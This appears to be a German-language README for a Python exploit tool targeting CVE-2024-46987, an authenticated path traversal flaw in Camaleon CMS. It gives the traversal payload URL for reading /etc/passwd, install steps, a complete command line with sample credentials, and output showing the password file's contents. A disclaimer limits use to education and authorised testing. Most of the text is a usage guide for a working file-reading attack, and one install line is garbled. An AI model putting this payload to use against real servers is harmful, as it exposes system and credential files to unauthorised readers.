
Mit Python erstellter Exploit
CVE-2024-46987 ist eine authentifizierte Path-Traversal-Schwachstelle (CWE-22) in Camaleon CMS (einem Ruby-on-Rails-basierten Content-Management-System). Sie ermöglicht einem angemeldeten Benutzer (auch mit niedrigen Berechtigungen), beliebige Dateien auf dem Server über die Aktion MediaController#download_private_file zu lesen.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NEin Angreifer mit gültigen Anmeldedaten kann eine manipulierte Anfrage an folgende URL senden: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtODER
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login erfolgreich
[*] Anfrage an: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Erfolg – Inhalt:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Hinweis: Das Skript geht von einem Rails-typischen Login-Formular aus (user[email], user[password], authenticity_token). Passen Sie die Payload-Felder an, falls Ihr Ziel benutzerdefinierte Namen verwendet.
Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests.
Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben (z.B. Bug-Bounty-Programme, interne Pentests, Labs wie HTB). Unbefugte Nutzung kann gegen Gesetze verstoßen. Der Autor ist nicht für Missbrauch verantwortlich.